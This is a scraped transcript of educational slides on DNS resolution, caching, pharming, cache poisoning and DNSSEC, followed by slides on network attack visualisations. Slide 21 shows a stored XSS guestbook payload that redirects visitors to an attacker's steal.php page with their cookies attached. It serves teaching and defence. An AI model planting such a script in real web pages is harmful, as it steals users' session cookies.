Presentation is loading. Please wait.

Presentation is loading. Please wait.

Computer Networks: Domain Name System 1.

Published byOskar Berg Modified over 6 years ago

Similar presentations

Presentation on theme: "Computer Networks: Domain Name System 1."— Presentation transcript:

1 Computer Networks: Domain Name System 1

2 Domain Name System The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses Vacation Savings DNS My Example Blog Spot 2 2

3 Iterative Name Resolution
. (root) Resolver cache 1 answer query .com Resolver cache Local Name Server Application Resolver cache query 2 answer google.com Resolver cache query answer 3

4 Name Resolution Resolution method when answer not in cache: Client
Where is Try com nameserver Try example.com nameserver Client ISP DNS Server root name server com example.com

5 DNS Caching Step 1: query yourdomain.org
Local NS Resolver cache Authoritative Name Server Local Machine Application Resolver cache query query Step 2: receive reply and cache at local NS and host Local NS Resolver cache Authoritative Name Server Local Machine Application Resolver cache answer answer

6 DNS Caching (con'd) Step 3: use cached results rather than querying the ANS Local NS Resolver cache Local Machine 1 Application Resolver cache query Local Machine 2 Application Resolver cache answer Step 4: Evict cache entries upon ttl expiration

7 Pharming: DNS Hijacking
Changing IP associated with a server maliciously: My Premium Blog Spot userID: password: Normal DNS Pharming attack Phishing: the different web sites look the same.

8 DNS Cache Poisoning Basic idea: give DNS servers false records and get it cached DNS uses a 16-bit request identifier to pair queries with answers Cache may be poisoned when a name server: Disregards identifiers Has predictable ids Accepts unsolicited DNS records There are 3 main different ways to do DNS cache poisoning. The first relies on redirecting the nameserver of the attacker's domain to the nameserver of the target domain, and then assigning this target nameserver a fake IP address. The second variant relies on redirecting the nameserver of another, unrelated domain to a fake nameserver. The third variant just involves “racing” the real nameserver to give an answer. 8 8

9 DNS Cache Poisoning Prevention
Use random identifiers for queries Always check identifiers Port randomization for DNS requests Deploy DNSSEC Challenging because it is still being deployed and requires reciprocity There are 3 main different ways to do DNS cache poisoning. The first relies on redirecting the nameserver of the attacker's domain to the nameserver of the target domain, and then assigning this target nameserver a fake IP address. The second variant relies on redirecting the nameserver of another, unrelated domain to a fake nameserver. The third variant just involves “racing” the real nameserver to give an answer. 9 9

10 DNSSEC Guarantees: Authenticity of DNS answer origin Integrity of reply Authenticity of denial of existence Accomplishes this by signing DNS replies at each step of the way Uses public-key cryptography to sign responses Typically use trust anchors, entries in the OS to bootstrap the process 10

11 DNS Signing 11

12 DNSSEC Deployment As the internet becomes regarded as critical infrastructure there is a push to secure DNS NIST is in the process of deploying it on root servers now May add considerable load to dns servers with packet sizes considerably larger than 512 byte size of UDP packets There are political concerns with the US controlling the root level of DNS

13 Development steps Work on the following lab first to understand DNS Pharming and cache poisoning attacks. Learn basics in HTML5 Design scenarios of DNS attacks Implementation and user study

14 Experience DNS attacks
DNS Pharming attack from Kevin’s Du SEED labs in Syracuse University ks_DNS/

15 HTML5 The new standard for HTML
New Elements, New Attributes, Full CSS3 Support, Video and Audio, 2D/3D Graphics, Local Storage, Local SQL Database, Web Applications New features should be based on HTML, CSS, DOM, and JavaScript Reduce the need for external plugins (like Flash) Better error handling More markup to replace scripting HTML5 should be device independent URL:

16 Interactive Security Visualization
9/20/2018 UTC/CSE

17 Network Security Visualization – Packet Sniffer
Packet sniffer is a program that captures all of the packets of data that pass through a given network interface, and recognizes and decodes certain packets of interest. sual_tools/packet_sniffer/packet_sniffer.html 9/20/2018

18 Network Security Visualization -- Wireless Network Attacks Simulator
Eavesdropping The attacker configures his/her network interface into promiscuous mode, which allows a network device to read each network packet that arrives at the device. Evil Twin An evil twin is a wireless access point (AP) that masquerades as a legitimate one. Man in the Middle The attacker intercepts the traffic between two computers. The attacker sniffs packets from the network, may modify the packets and inserts them back into the network. ARP Cache Poisoning Address Resolution Protocol (ARP) is a network layer protocol used to associate an IP address with a MAC address. A network device has an ARP cache, which contains all the IP addresses and MAC addresses the device has already matched together. ttacks/wireless_attacks.html 9/20/2018

19 Network Security Visualization -- SYN Flood
SYN Flood, one of Denial-of-Service attacks sual_tools/SYNFloodDemo/index.htm 9/20/2018

20 Network Security Visualization – Web Security
Cross site scripting: attacker injects scripting code into pages generated by a web application Script could be malicious code JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash Threats: Phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising , execution of code on the client, ... 9/20/2018

21 XSS Example guestbook.html <html>
Website allows posting of comments in a guestbook Server incorporates comments into page returned <html> <body> <title>My Guestbook!</title> Thanks for signing my guestbook!<br /> Here's what everyone else had to say:<br /> Joe: Hi! <br /> John: Hello, how are you? <br /> Jane: How does this guestbook work? <br /> </body> Comment that includes malicious JavaScript Evilguy: <script> document.location = " </script> guestbook.html <html> <title>Sign My Guestbook!</title> <body> Sign my guestbook! <form action="sign.php" method="POST"> <input type="text" name="name"> <input type="text" name="message" size="40"> <input type="submit" value="Submit"> </form> </body> </html> Redirect visitor to the attacker’s site and concatenate the user’s cookies to the URL as a GET parameter for the steal.php page. If the sign.php copies whatever the user types in the post form into the content of the guest book, the feedback will be sent to other users. 9/20/2018

22 Animation of XSS simple-flash-animation (under development) 9/20/2018

Download ppt "Computer Networks: Domain Name System 1."

Similar presentations

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
ARP Cache Poisoning How the outdated Address Resolution Protocol can be easily abused to carry out a Man In The Middle attack across an entire network.

ARP Cache Poisoning How the outdated Address Resolution Protocol can be easily abused to carry out a Man In The Middle attack across an entire network.
Sergei Komarov. DNS  Mechanism for IP hostname resolution  Globally distributed database  Hierarchical structure  Comprised of three components.

Sergei Komarov. DNS  Mechanism for IP hostname resolution  Globally distributed database  Hierarchical structure  Comprised of three components.
SCADA Security, DNS Phishing

SCADA Security, DNS Phishing
Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
Computer Networks: Domain Name System. The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses Vacation.

Computer Networks: Domain Name System. The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses Vacation.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.

Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
Foundations of Network and Computer Security J J ohn Black Lecture #35 Dec 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #35 Dec 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Man in the Middle attacks and ARP poisoning explained

Man in the Middle attacks and ARP poisoning explained
Domain Name System | DNSSEC. 2  Internet Protocol address uniquely identifies laptops or phones or other devices  The Domain Name System matches IP.

Domain Name System | DNSSEC. 2  Internet Protocol address uniquely identifies laptops or phones or other devices  The Domain Name System matches IP.
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.

D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.
IT 210 The Internet & World Wide Web introduction.

IT 210 The Internet & World Wide Web introduction.
DNS and HTTP. Finally, the application layer! We have learned about: – Signals being sent on wires – Frames carried over dumb local networks – Packets.

DNS and HTTP. Finally, the application layer! We have learned about: – Signals being sent on wires – Frames carried over dumb local networks – Packets.
Computer Networks: Domain Name System. The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses Vacation.

Computer Networks: Domain Name System. The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses Vacation.
CSUF Chapter 6 1. Computer Networks: Domain Name System 2.

CSUF Chapter 6 1. Computer Networks: Domain Name System 2.
CSCI 6962: Server-side Design and Programming Secure Web Programming.

CSCI 6962: Server-side Design and Programming Secure Web Programming.
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.

Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
DNS (Domain Name System) Protocol On the Internet, the DNS associates various sorts of information with domain names. A domain name is a meaningful and.

DNS (Domain Name System) Protocol On the Internet, the DNS associates various sorts of information with domain names. A domain name is a meaningful and.

Similar presentations

Ads by Google